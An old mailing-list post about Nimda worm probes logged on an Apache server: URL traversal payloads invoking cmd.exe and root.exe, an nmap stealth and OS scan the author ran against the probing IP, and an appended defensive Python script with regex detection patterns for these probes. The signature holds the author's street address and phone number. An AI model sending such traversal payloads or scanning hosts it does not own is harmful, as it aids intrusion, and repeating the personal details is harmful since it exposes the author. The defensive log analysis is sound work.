Hello *,

Right now there is once again a new Internet worm called "nimda" haunting the networks. But everything I have read about this worm says that it _ONLY_ attacks WinXX(XX)? machines ... !!

Now I have checked my Apache log and found the following:

| 217.17.225.197 - - [19/Sep/2001:16:50:17 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
| 217.17.225.197 - - [19/Sep/2001:16:50:19 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
| 217.17.225.197 - - [19/Sep/2001:16:50:21 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
| 217.17.225.197 - - [19/Sep/2001:16:50:26 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
| 217.17.225.197 - - [19/Sep/2001:16:50:38 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
| 217.17.225.197 - - [19/Sep/2001:16:50:40 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
| 217.17.225.197 - - [19/Sep/2001:16:50:42 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
| 217.17.225.197 - - [19/Sep/2001:16:50:44 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
| 217.17.225.197 - - [19/Sep/2001:16:50:46 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
| 217.17.225.197 - - [19/Sep/2001:16:50:51 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
| 217.17.225.197 - - [19/Sep/2001:16:50:54 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"

OK, looks like a nimda attack ... so let's turn my nmap loose on it ... just out of curiosity #8-):

| thoregon:~# nmap -v -sS -sR -O 217.17.225.197
|
| Starting nmap V. 2.54BETA28 ( www.insecure.org/nmap/ )
| Host (217.17.225.197) appears to be up ... good.
| Initiating SYN Stealth Scan against (217.17.225.197)
| Adding open port 25/tcp
| Adding open port 1002/tcp
| Adding open port 1723/tcp
| Adding open port 80/tcp
| Adding open port 135/tcp
| Adding open port 443/tcp
| Adding open port 139/tcp
| Adding open port 2043/tcp
| Adding open port 8007/tcp
| Adding open port 8080/tcp
| The SYN Stealth Scan took 221 seconds to scan 1548 ports.
| Initiating RPCGrind Scan against (217.17.225.197)
| The RPCGrind Scan took 35 seconds to scan 1548 ports.
| For OSScan assuming that port 25 is open and port 1 is closed and neither are firewalled
| For OSScan assuming that port 25 is open and port 1 is closed and neither are firewalled
| For OSScan assuming that port 25 is open and port 1 is closed and neither are firewalled
| Interesting ports on (217.17.225.197):
| (The 1538 ports scanned but not shown below are in state: closed)
| Port       State       Service (RPC)
| 25/tcp     open        smtp
| 80/tcp     open        http
| 135/tcp    open        loc-srv
| 139/tcp    open        netbios-ssn
| 443/tcp    open        https
| 1002/tcp   open        unknown
| 1723/tcp   open        pptp
| 2043/tcp   open        isis-bcast
| 8007/tcp   open        jserv
| 8080/tcp   open        http-proxy
|
| No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
|
| TCP/IP fingerprint:
| SInfo(V=2.54BETA28%P=i586-pc-linux-gnu%D=9/19%Time=3BA8B2BC%O=25%C=1)
                       ^^^^^^^^^^^^^^^^^
| TSeq(Class=RI%gcd=1%SI=4DB4C%TS=U)
| TSeq(Class=RI%gcd=1%SI=E24DC%IPID=RD%TS=U)
| TSeq(Class=RI%gcd=1%SI=72C08%TS=U)
| T1(Resp=Y%DF=Y%W=2238%ACK=S++%Flags=AS%Ops=M)
| T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
| T3(Resp=Y%DF=Y%W=2238%ACK=S++%Flags=AS%Ops=M)
| T4(Resp=N)
| T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
| T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
| T5(Resp=N)
| T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
| T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
| PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
| PU(Resp=N)
| PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
|
| TCP Sequence Prediction: Class=random positive increments
|                          Difficulty=470024 (Good luck!)
| IPID Sequence Generation: Busy server or unknown class
|
| Nmap run completed -- 1 IP address (1 host up) scanned in 294 seconds

Seems to be a Linux box!! Or am I misinterpreting something?? Could it be that the "nimda" attack came from a machine that sits behind this Linux box and acts via masquerading or a proxy??

Regards
Markus

-- 
[ markus hubig        ] [ mail: mhubig@web.de    ] [ debian/gnu linux 2.3 sid ]
[ vorholzstraße 6     ] [ icq: 98188685          ] [ linux 2.4.9 i686         ]
[ 76131 karlsruhe     ] [ tele: +049 721 6657522 ] [ reg. Linux user #204961  ]
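A defender-side way to pick a probe sequence like the one in the post out of an Apache access log, as an added example that is not from the original post: it parses common/combined-format lines, tags request URIs carrying the signatures the log excerpt shows (root.exe, cmd.exe under /c and /d, the %255c double-encoded and overlong-UTF-8 traversals), and groups the hits per source IP with first and last timestamps. The sample log lines and their IPs are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache common/combined log format: ip ident user [time] "METHOD URI PROTO" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)')

# Request-URI signatures of the probe sequence shown in the post: the root.exe backdoor left behind by
# Code Red II, cmd.exe via the /c and /d virtual directories, and IIS traversal bypasses using double
# URL-encoding (%255c) and overlong UTF-8 (%c1%1c, %c0%2f, %c0%af).
PROBE_RULES = [
    ("codered2-backdoor", re.compile(r"/root\.exe", re.I)),
    ("cmd-exe-direct", re.compile(r"^/[cd]/winnt/system32/cmd\.exe", re.I)),
    ("double-encoded-traversal", re.compile(r"%255c", re.I)),
    ("overlong-utf8-traversal", re.compile(r"%c1%1c|%c0%2f|%c0%af", re.I)),
]

def classify_uri(uri):
    """Return the names of every probe rule the request URI matches (empty list if none)."""
    return [name for name, rx in PROBE_RULES if rx.search(uri)]

def decode_twice(uri):
    """Decode a URI twice, as the vulnerable IIS did (%255c -> %5c -> backslash), escaping the web root."""
    return unquote(unquote(uri))

def triage(lines):
    """Group matching requests by source IP: hit count, rules seen, first and last timestamp."""
    report = defaultdict(lambda: {"hits": 0, "rules": set(), "first": None, "last": None})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        rules = classify_uri(m["uri"])
        if not rules:
            continue  # ordinary traffic
        entry = report[m["ip"]]
        entry["hits"] += 1
        entry["rules"].update(rules)
        entry["first"] = entry["first"] or m["time"]
        entry["last"] = m["time"]
    return dict(report)

# Constructed sample in the same format as the post's log excerpt (documentation IPs, not real hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Sep/2001:16:50:17 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
192.0.2.10 - - [19/Sep/2001:16:50:21 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
192.0.2.10 - - [19/Sep/2001:16:50:38 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
192.0.2.10 - - [19/Sep/2001:16:50:54 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
198.51.100.7 - - [19/Sep/2001:17:02:03 +0200] "GET /index.html HTTP/1.0" 200 1834 "-" "Mozilla/4.7"
"""
```

Calling `triage(SAMPLE_LOG.splitlines())` yields one entry for 192.0.2.10 with four hits spanning all four rules and none for the ordinary request, which is the shape of report worth feeding into a blocklist or an abuse notification to the source's network owner.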